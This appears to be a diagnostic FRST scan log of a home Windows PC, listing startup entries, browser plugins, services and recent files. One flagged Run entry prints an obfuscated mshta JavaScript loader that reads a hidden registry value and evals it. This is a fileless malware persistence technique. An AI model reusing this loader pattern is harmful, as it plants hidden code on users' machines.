(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [1337000 2015-04-30] (Microsoft Corporation)
HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [89184 2012-11-05] (Microsoft Corporation)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-924763536-93737856-2869661127-1000\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [53753984 2015-07-18] (Skype Technologies S.A.)
HKU\S-1-5-21-924763536-93737856-2869661127-1000\...\Run: [**ac49aad3<*>] => mshta javascript:YKTfM8a="lesbPHGZt";N3x=new%20ActiveXObject("WScript.Shell");O9uceQw="FoIi";XULc3=N3x.RegRead("HKCU\\software\\89410848\\8f956f6e");YZC3oqT="kX";eval(XULc3);ttz9gHHS="gOskW"; <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-18\...\RunOnce: [SPReview] => C:\Windows\System32\SPReview\SPReview.exe [301568 2014-05-25] (Microsoft Corporation)
Startup: C:\Users\Mom\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Monitor Ink Alerts - HP Photosmart 5510 series.lnk [2014-08-15]
ShortcutTarget: Monitor Ink Alerts - HP Photosmart 5510 series.lnk -> C:\Program Files\HP\HP Photosmart 5510 series\Bin\HPStatusBL.dll (Hewlett-Packard Co.)
ShellIconOverlayIdentifiers: ["DropboxExt1"] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => No File
ShellIconOverlayIdentifiers: ["DropboxExt2"] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => No File
ShellIconOverlayIdentifiers: ["DropboxExt3"] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => No File
ShellIconOverlayIdentifiers: ["DropboxExt4"] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => No File
ShellIconOverlayIdentifiers: ["DropboxExt5"] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => No File
ShellIconOverlayIdentifiers: ["DropboxExt6"] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => No File
ShellIconOverlayIdentifiers: ["DropboxExt7"] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => No File
ShellIconOverlayIdentifiers: ["DropboxExt8"] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => No File

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKU\S-1-5-21-924763536-93737856-2869661127-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = MSN UK | Hotmail, Outlook, Skype, Bing, Latest News, Photos and Videos
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-924763536-93737856-2869661127-1000 -> {61280EC1-E2ED-4F1A-94DF-013CA2D393D5} URL = https://www.google.com/search?q={searchTerms}
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\ssv.dll [2015-02-02] (Oracle Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\jp2ssv.dll [2015-02-02] (Oracle Corporation)
Tcpip\Parameters: [DhcpNameServer] 194.168.4.100 194.168.8.100
Tcpip\..\Interfaces\{394329BF-2D3B-4468-A7DD-AF1FAB398EDA}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{C5CE6B46-A54D-42A2-9CA0-BC4CFE903BFF}: [DhcpNameServer] 194.168.4.100 194.168.8.100

FireFox:
========
FF ProfilePath: C:\Users\Mom\AppData\Roaming\Mozilla\Firefox\Profiles\csjr5mn3.default
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.40416.0\npctrl.dll [2015-04-16] ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~3\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1211151.dll [2014-04-15] (Adobe Systems, Inc.)
FF Plugin-x32: @java.com/DTPlugin,version=11.31.2 -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\dtplugin\npDeployJava1.dll [2015-02-02] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.31.2 -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\plugin2\npjp2.dll [2015-02-02] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.40416.0\npctrl.dll [2015-04-15] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.28.1\npGoogleUpdate3.dll [2015-07-16] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.28.1\npGoogleUpdate3.dll [2015-07-16] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2014-07-23] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2014-07-23] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2015-06-29] (Adobe Systems Inc.)
FF Plugin-x32: Soda PDF 6 -> C:\Program Files (x86)\Soda PDF 6\np-previewer.dll [No File]

Chrome:
=======
CHR Profile: C:\Users\Mom\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\Mom\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-05-24]
CHR Extension: (Google Drive) - C:\Users\Mom\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-05-24]
CHR Extension: (YouTube) - C:\Users\Mom\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-05-24]
CHR Extension: (Adblock Plus) - C:\Users\Mom\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2014-09-25]
CHR Extension: (Google Search) - C:\Users\Mom\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-05-24]
CHR Extension: (AdBlock) - C:\Users\Mom\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2014-05-25]
CHR Extension: (Chrome Hotword Shared Module) - C:\Users\Mom\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-03-13]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Mom\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-05-24]
CHR Extension: (Gmail) - C:\Users\Mom\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-05-24]
CHR HKLM\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - https://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - https://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [23816 2015-04-30] (Microsoft Corporation)
R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [366544 2015-04-30] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
S4 LULU Software CrashHandler; "C:\Program Files (x86)\Soda PDF 6\crash-handler-ws.exe" [X]
S4 Soda PDF 6; "C:\Program Files (x86)\Soda PDF 6\ws.exe" [X]

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [280376 2015-03-04] (Microsoft Corporation)
R2 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [124568 2015-03-04] (Microsoft Corporation)
S3 MBAMSwissArmy; \??\C:\Windows\system32\drivers\MBAMSwissArmy.sys [X]
S1 MpKsl958ccaaf; \??\c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{B81BF9EF-C1F0-48CC-8D15-C1F0E6522CDF}\MpKsl958ccaaf.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2015-08-11 23:13 - 2015-08-11 23:13 - 00011507 _____ C:\Users\Mom\Downloads\FRST.txt
2015-08-11 23:12 - 2015-08-11 23:13 - 00000000 ____D C:\FRST
2015-08-11 23:11 - 2015-08-11 23:11 - 02172928 _____ (Farbar) C:\Users\Mom\Downloads\FRST64.exe
2015-08-11 22:52 - 2015-08-11 23:02 - 00000000 ____D C:\AdwCleaner
2015-08-11 22:49 - 2015-08-11 22:49 - 00001459 _____ C:\Users\Mom\Desktop\AdwCleaner - Shortcut.lnk
2015-08-11 22:48 - 2015-08-11 22:48 - 02248704 _____ C:\Users\Mom\Downloads\AdwCleaner.exe
2015-08-09 17:40 - 2015-08-09 17:40 - 00000000 ____D C:\ProgramData\Hewlett-Packard
2015-08-08 21:12 - 2015-08-08 21:12 - 00012552 _____ C:\Users\Mom\Desktop\attach.txt
2015-08-08 21:12 - 2015-08-08 21:11 - 00020015 _____ C:\Users\Mom\Desktop\dds.txt
2015-08-08 21:08 - 2015-08-08 21:08 - 00688992 ____R (Swearware) C:\Users\Mom\Desktop\dds.scr
2015-08-05 20:08 - 2015-08-05 20:36 - 00000000 ____D C:\Users\Mom\Downloads\Delicatessen.1991.BRRip.H264.AAC.Gopo
2015-08-05 19:45 - 2015-08-05 19:46 - 00000000 ____D C:\Users\Mom\Downloads\De grønne slagtere
2015-07-28 08:46 - 2015-07-25 19:07 - 00017856 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe
2015-07-28 08:46 - 2015-07-25 19:04 - 00765440 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2015-07-28 08:46 - 2015-07-25 19:04 - 00726528 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2015-07-28 08:46 - 2015-07-25 19:03 - 01085440 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2015-07-28 08:46 - 2015-07-25 19:03 - 00433664 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2015-07-28 08:46 - 2015-07-25 19:03 - 00227328 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2015-07-28 08:46 - 2015-07-25 19:03 - 00067584 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll
2015-07-28 08:46 - 2015-07-25 18:55 - 01145856 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2015-07-26 13:09 - 2015-07-26 13:09 - 00000000 ____D C:\Users\Mom\Documents\Visual Studio 2005
2015-07-25 10:02 - 2015-07-26 23:14 - 1514497241 ____R C:\Users\Mom\Downloads\BBC.The.Plantagenets.3of3.The.Death.of.Kings.HDTV.x264.AAC.MVGroup.org.mkv
2015-07-25 10:02 - 2015-07-26 16:12 - 1749917869 ____R C:\Users\Mom\Downloads\BBC.The.Plantagenets.2of3.An.English.Empire.HDTV.x264.AAC.MVGroup.org.mkv
2015-07-25 09:25 - 2015-07-26 12:22 - 1585950862 ____R C:\Users\Mom\Downloads\BBC.The.Plantagenets.1of3.The.Devils.Brood.HDTV.x264.AAC.MVGroup.org.mkv
2015-07-25 08:55 - 2015-07-25 09:08 - 00000000 ____D C:\Users\Mom\Downloads\Louise Hay - You Can Heal Your Life book and study course
2015-07-25 08:51 - 2015-07-25 09:33 - 1789018062 ____R C:\Users\Mom\Downloads\The Hollow Crown - S01E01 - 720P - SweSub.mp4
2015-07-21 16:53 - 2015-07-21 16:53 - 00002697 _____ C:\Users\Public\Desktop\Skype.lnk
2015-07-21 16:53 - 2015-07-21 16:53 - 00000000 ___RD C:\Program Files (x86)\Skype
2015-07-21 16:53 - 2015-07-21 16:53 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2015-07-21 16:50 - 2015-07-21 16:50 - 01384064 _____ (Skype Technologies S.A.) C:\Users\Mom\Downloads\SkypeSetup.exe
2015-07-21 07:48 - 2015-07-15 04:19 - 00100864 _____ (Microsoft Corporation) C:\Windows\system32\fontsub.dll
2015-07-21 07:48 - 2015-07-15 04:19 - 00046080 _____ (Adobe Systems) C:\Windows\system32\atmlib.dll
2015-07-21 07:48 - 2015-07-15 04:19 - 00041984 _____ (Microsoft Corporation) C:\Windows\system32\lpk.dll
2015-07-21 07:48 - 2015-07-15 04:19 - 00014336 _____ (Microsoft Corporation) C:\Windows\system32\dciman32.dll
2015-07-21 07:48 - 2015-07-15 03:55 - 00070656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fontsub.dll
2015-07-21 07:48 - 2015-07-15 03:55 - 00034304 _____ (Adobe Systems) C:\Windows\SysWOW64\atmlib.dll
2015-07-21 07:48 - 2015-07-15 03:55 - 00010240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dciman32.dll
2015-07-21 07:48 - 2015-07-15 03:54 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\lpk.dll
2015-07-21 07:48 - 2015-07-15 02:59 - 00372224 _____ (Adobe Systems Incorporated) C:\Windows\system32\atmfd.dll
2015-07-21 07:48 - 2015-07-15 02:52 - 00299008 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\atmfd.dll
2015-07-15 09:23 - 2015-07-09 18:58 - 03154944 _____ (Microsoft Corporation) C:\Windows\system32\wucltux.dll
2015-07-15 09:23 - 2015-07-09 18:58 - 02603008 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2015-07-15 09:23 - 2015-07-09 18:58 - 00696320 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll
2015-07-15 09:23 - 2015-07-09 18:58 - 00192000 _____ (Microsoft Corporation) C:\Windows\system32\wuwebv.dll
2015-07-15 09:23 - 2015-07-09 18:58 - 00139776 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
2015-07-15 09:23 - 2015-07-09 18:58 - 00098304 _____ (Microsoft Corporation) C:\Windows\system32\wudriver.dll
2015-07-15 09:23 - 2015-07-09 18:58 - 00091136 _____ (Microsoft Corporation) C:\Windows\system32\WinSetupUI.dll
2015-07-15 09:23 - 2015-07-09 18:58 - 00037888 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll
2015-07-15 09:23 - 2015-07-09 18:58 - 00037376 _____ (Microsoft Corporation) C:\Windows\system32\wuapp.exe
2015-07-15 09:23 - 2015-07-09 18:58 - 00036864 _____ (Microsoft Corporation) C:\Windows\system32\wups.dll
2015-07-15 09:23 - 2015-07-09 18:58 - 00012288 _____ (Microsoft Corporation) C:\Windows\system32\wu.upgrade.ps.dll
2015-07-15 09:23 - 2015-07-09 18:43 - 00566784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapi.dll
2015-07-15 09:23 - 2015-07-09 18:43 - 00173056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuwebv.dll
2015-07-15 09:23 - 2015-07-09 18:43 - 00093184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wudriver.dll
2015-07-15 09:23 - 2015-07-09 18:43 - 00030208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wups.dll
2015-07-15 09:23 - 2015-07-09 18:42 - 00034816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapp.exe
2015-07-15 09:23 - 2015-07-02 22:21 - 19877376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2015-07-15 09:23 - 2015-07-02 22:08 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2015-07-15 09:23 - 2015-07-02 21:50 - 02279424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2015-07-15 09:23 - 2015-07-02 21:49 - 25193984 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2015-07-15 09:23 - 2015-07-02 21:46 - 00479232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2015-07-15 09:23 - 2015-07-02 21:40 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2015-07-15 09:23 - 2015-07-02 21:23 - 02885632 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2015-07-15 09:23 - 2015-07-02 21:19 - 12855296 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2015-07-15 09:23 - 2015-07-02 21:12 - 00615936 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2015-07-15 09:23 - 2015-07-02 20:55 - 01310720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2015-07-15 09:23 - 2015-07-02 20:20 - 14453248 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2015-07-15 09:23 - 2015-07-02 19:59 - 01545728 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2015-07-15 09:23 - 2015-06-27 03:47 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2015-07-15 09:23 - 2015-06-27 03:43 - 05923840 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2015-07-15 09:23 - 2015-06-27 02:58 - 00620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2015-07-15 09:23 - 2015-06-27 02:39 - 04520448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2015-07-15 09:23 - 2015-06-25 19:09 - 00389832 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2015-07-15 09:23 - 2015-06-25 18:43 - 00342736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2015-07-15 09:23 - 2015-06-25 09:57 - 03207168 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2015-07-15 09:23 - 2015-06-20 21:06 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2015-07-15 09:23 - 2015-06-20 20:50 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2015-07-15 09:23 - 2015-06-20 20:49 - 00584192 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2015-07-15 09:23 - 2015-06-20 20:49 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2015-07-15 09:23 - 2015-06-20 20:40 - 00054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2015-07-15 09:23 - 2015-06-20 20:39 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2015-07-15 09:23 - 2015-06-20 20:34 - 00816640 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2015-07-15 09:23 - 2015-06-20 20:34 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2015-07-15 09:23 - 2015-06-20 20:34 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2015-07-15 09:23 - 2015-06-20 20:25 - 00968704 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2015-07-15 09:23 - 2015-06-20 20:21 - 00490496 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2015-07-15 09:23 - 2015-06-20 20:13 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2015-07-15 09:23 - 2015-06-20 20:07 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2015-07-15 09:23 - 2015-06-20 20:05 - 00316928 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2015-07-15 09:23 - 2015-06-20 19:48 - 00801280 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2015-07-15 09:23 - 2015-06-20 19:48 - 00720384 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2015-07-15 09:23 - 2015-06-20 19:46 - 02125824 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2015-07-15 09:23 - 2015-06-20 19:46 - 01359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2015-07-15 09:23 - 2015-06-20 19:02 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2015-07-15 09:23 - 2015-06-19 19:25 - 00504320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2015-07-15 09:23 - 2015-06-19 19:25 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2015-07-15 09:23 - 2015-06-19 19:24 - 00341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2015-07-15 09:23 - 2015-06-19 19:24 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2015-07-15 09:23 - 2015-06-19 19:23 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2015-07-15 09:23 - 2015-06-19 19:17 - 00047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2015-07-15 09:23 - 2015-06-19 19:16 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2015-07-15 09:23 - 2015-06-19 19:13 - 00664064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2015-07-15 09:23 - 2015-06-19 19:13 - 00115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2015-07-15 09:23 - 2015-06-19 19:03 - 00418304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2015-07-15 09:23 - 2015-06-19 18:57 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2015-07-15 09:23 - 2015-06-19 18:53 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2015-07-15 09:23 - 2015-06-19 18:52 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2015-07-15 09:23 - 2015-06-19 18:51 - 00285696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2015-07-15 09:23 - 2015-06-19 18:40 - 02052608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2015-07-15 09:23 - 2015-06-19 18:40 - 00689152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2015-07-15 09:23 - 2015-06-19 18:39 - 01155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2015-07-15 09:23 - 2015-06-19 18:15 - 01951232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2015-07-15 09:23 - 2015-06-19 18:11 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2015-07-15 09:23 - 2015-06-17 18:47 - 00404992 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2015-07-15 09:23 - 2015-06-17 18:37 - 00312320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll
2015-07-15 09:23 - 2015-06-09 19:03 - 03180544 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorets.dll
2015-07-15 09:23 - 2015-06-09 19:03 - 00016384 _____ (Microsoft Corporation) C:\Windows\system32\RdpGroupPolicyExtension.dll
2015-07-15 09:23 - 2015-06-02 01:07 - 00254976 _____ (Microsoft Corporation) C:\Windows\system32\cewmdm.dll
2015-07-15 09:23 - 2015-06-02 00:47 - 00210432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cewmdm.dll
2015-07-15 09:22 - 2015-07-04 19:07 - 02087424 _____ (Microsoft Corporation) C:\Windows\system32\ole32.dll
2015-07-15 09:22 - 2015-07-04 18:48 - 01414656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ole32.dll
2015-07-15 09:22 - 2015-07-01 21:56 - 00155584 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2015-07-15 09:22 - 2015-07-01 21:56 - 00095680 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2015-07-15 09:22 - 2015-07-01 21:49 - 01461760 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2015-07-15 09:22 - 2015-07-01 21:49 - 01216512 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2015-07-15 09:22 - 2015-07-01 21:49 - 00729088 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2015-07-15 09:22 - 2015-07-01 21:49 - 00342016 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2015-07-15 09:22 - 2015-07-01 21:49 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2015-07-15 09:22 - 2015-07-01 21:49 - 00309760 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2015-07-15 09:22 - 2015-07-01 21:49 - 00210944 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2015-07-15 09:22 - 2015-07-01 21:49 - 00136192 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2015-07-15 09:22 - 2015-07-01 21:49 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2015-07-15 09:22 - 2015-07-01 21:49 - 00029184 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2015-07-15 09:22 - 2015-07-01 21:49 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2015-07-15 09:22 - 2015-07-01 21:48 - 00044032 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll
2015-07-15 09:22 - 2015-07-01 21:48 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2015-07-15 09:22 - 2015-07-01 21:47 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2015-07-15 09:22 - 2015-07-01 21:47 - 00031232 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2015-07-15 09:22 - 2015-07-01 21:43 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2015-07-15 09:22 - 2015-07-01 21:43 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2015-07-15 09:22 - 2015-07-01 21:39 - 00686080 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2015-07-15 09:22 - 2015-07-01 21:30 - 00552960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2015-07-15 09:22 - 2015-07-01 21:30 - 00259584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2015-07-15 09:22 - 2015-07-01 21:30 - 00248832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2015-07-15 09:22 - 2015-07-01 21:30 - 00221184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2015-07-15 09:22 - 2015-07-01 21:30 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
